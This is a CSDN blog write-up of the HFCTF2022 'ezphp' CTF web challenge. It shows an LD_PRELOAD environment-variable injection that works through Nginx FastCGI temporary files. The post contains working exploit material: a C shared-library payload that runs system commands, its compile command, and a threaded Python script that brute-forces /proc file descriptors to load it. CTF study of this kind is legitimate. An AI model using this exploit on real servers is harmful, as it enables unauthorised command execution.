HFCTF2022 Web ezphp

最新推荐文章于 2023-02-08 22:13:26 发布
最新推荐文章于 2023-02-08 22:13:26 发布
阅读量5.5k 收藏 3
点赞数 2
分类专栏: CTF刷题记录 文章标签: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/123790012
版权

HFCTF2022 ezphp

文章目录

题目上去给了代码

<?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?>

这个题目本来以为考点是p佬的文章,但是不是这样的。
p佬文章:我是如何利用环境变量注入执行任意命令

这个题目的考点是Nginx 在后端 Fastcgi 响应过大 或 请求正文 body 过大时会产生临时文件。如果打开一个进程打开了某个文件,某个文件就会出现在 /proc/PID/fd/ 目录下,我们可以通过重复发包so造成文件缓存,然后用LD_PRELOAD去加载我们这个动态链接库

当nginx接收来自fastcgi的响应时,若大小超过限定值不适合以内存的形式来存储的时候,一部分就会以临时文件的形式保存到磁盘上。
所以我们的exp.so需要加上一些无用数据让整个文件稍大。
具体可以参考hxp CTF 2021 跳跳糖社区

exp.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void preload (void){
	  unsetenv("LD_PRELOAD");
	    system("id");
	      system("cat /flag > /var/www/html/flag");

编译为so文件

gcc -shared -fPIC exp.c -o exp.so

然后放在python脚本同目录下,脚本参考唯独你没懂战队的wp
唯独你没懂战队的wp
exp.py

import  threading, requests
URL2 = f'http://192.168.56.5:7005/index.php'
nginx_workers = [12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27]
done = False


def uploader():
    print('[+] starting uploader')
    with open("exp.so","rb") as f:
        data1 = f.read()+b'0'*1024*1000
        #print(data1)
    while not done:
        requests.get(URL2, data=data1)
for _ in range(16):
    t = threading.Thread(target=uploader)
    t.start()
def bruter(pid):
    global done
    while not done:
        print(f'[+] brute loop restarted: {pid}')
        for fd in range(4, 32):
            try:
                requests.get(URL2, params={
                    'env': f"LD_PRELOAD=/proc/{pid}/fd/{fd}"
                })
            except:
                pass


for pid in nginx_workers:
    a = threading.Thread(target=bruter, args=(pid, ))
    a.start()

本来是在vps上测试的,没通。。然后在buu测试,没有通。。。经常返回429。
最后在本地部署docker环境打通了,flag为自己定义的

在这里插入图片描述

参考链接

  1. hxp CTF 2021 跳跳糖社区
  2. p佬文章:我是如何利用环境变量注入执行任意命令
  3. 唯独你没懂战队的wp
Sk1y
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1
SHCTF2023
……
10-30 166
shctf2023
[虎符CTF] ezphp:LD_PRELOAD环境变量注入
Landasika的博客
05-17 940
目录 思路遇到的问题什么是.so文件什么是LD_PRELOAD构造.so文件找到Nginx的缓存文件的目录遇到的问题找到缓存目录上传.so 思路 参考链接: http://y24.top/posts/%E6%96%87%E7%AB%A0/2022%E8%99%8E%E7%AC%A6ctf/ https://tttang.com/archive/1384/ https://www.anq...
Java安全(十四) CTF-Java题目复现
WDWAGAAFGAGDADSA的博客
05-04 2313
最近复现学习的java题目
ctfshow—PHP特性
cosmoslin的博客
09-14 2137
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
BUUCTF [BJDCTF2020]EzPHP1详解
Aiwin的博客
05-14 1234
BUUCTF [BJDCTF2020]EzPHP1包含的知识与详解
[HFCTF2022]ezphp
snowlyzz的博客
10-24 2556
FastCgi 缓存文件加载恶意so
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6604
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
PwnTheBox(web篇)---ezphp
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-08 715
文章目录PwnTheBox(web篇)---ezphp题目题解 PwnTheBox(web篇)—ezphp 题目 <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } }
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
CTF 湖湘杯 决赛 2021 final.zip
12-07
CTF 湖湘杯 决赛 2021 final
[BJDCTF2020]EzPHP create_function()代码注入绕过$_REQUEST和QUERY_STRING等
a3320315的博客
01-29 3851
0x01 题目源码 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><font color=re...
BUUCTF-WEB [BJDCTF2020]EzPHP 1
qq_36410265的博客
02-08 546
分析程序执行过程
[ctfshow web入门]常用姿势817-820 &&虎符ctf ezphp
weixin_45751765的博客
05-09 1147
0x00 前言 接上一篇继续记录ctfshow web入门常用姿势 嗝 820 非常规文件上传 php中的base64_decode只对合法字符合并后进行解码,非法字符会直接丢弃,不参与整体的base64解码 合法字符包括 A-Za-z0-9/+ 字母26+26 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-04-30 10:52:40 # @Last Modified by: h1xa # @Last Mod
bugku ctf web8 (txt????)
qq_42777804的博客
08-02 639
进去网站 是如下的源码 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!<...
HFCTF2022RE部分WP
weixin_50783572的博客
03-28 896
fpbe 这题通过题目了解到了这是一个用了BPF的程序 通过查看https://github.com/libbpf/libbpf/blob/master/src/libbpf.h 可以知道对程序进行了hook /** * @brief **bpf_program__attach_uprobe()** attaches a BPF program * to the userspace function which is found by binary path and * offset. You can
HF2022-EzPHP复现
as you know, nlp is fantasitc!
07-27 296
由于程序是运行时动态加载链接的库,如果让程序加载一个恶意的文件,那么就可以劫持程序的运行,从而可以绕过disable_function,执行命令。LD_PRELOAD,是个环境变量,用于动态库的加载,动态库加载的优先级最高,一般情况下,其加载顺序为。构造更大的二进制文件,通过在一个so文件尾部追加脏字符。...
图解迪杰斯特拉(Dijkstra)最短路径算法.docx
05-02
一、最短路径的概念及应用 在介绍最短路径之前我们首先要明白两个概念:什么是源点,什么是终点?在一条路径中,起始的第 一个节点叫做源点;终点:在一条路径中,最后一个的节点叫做终点;注意!源点和终点都只是相对 于一条路径而言,每一条路径都会有相同或者不相同的源点和终点。 而最短路径这个词不用过多解释,就是其字面意思: 在图中,对于非带权无向图而言, 从源点到终点 边最少的路径(也就是 BFS 广度优先的方法); 而对于带权图而言, 从源点到终点权值之和最少的 路径叫最短路径; 最短路径应用:道路规划; 我们最关心的就是如何用代码去实现寻找最短路径, 通过实现最短路径有两种算法:Dijkstra 迪杰斯 特拉算法和 Floyd 弗洛伊德算法, 接下来我会详细讲解 Dijkstra 迪杰斯特拉算法;
基于faster-rcnn实现的行人检测算法python源码+项目说明+详细注释.zip
最新发布
05-02
基于faster-rcnn实现的行人检测算法python源码+项目说明+详细注释.zip 使用方法: 1.编译安装faster-rcnn的python接口,代码在:https://github.com/rbgirshick/py 2.下载训练好的caffe模型,百度云链接为:https://pan.baidu.com/s/1w479QUUAwLBS2AJbc-eXIA,将下载的模型文件放到faster-rcnn文件夹的data/faster_rcnn_models文件夹中 3.将本项目中的文件夹替换安装好的faster-rcnn源码中的文件夹 4.使用tools文件夹下的测试脚本运行demo:python person_detect.py

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值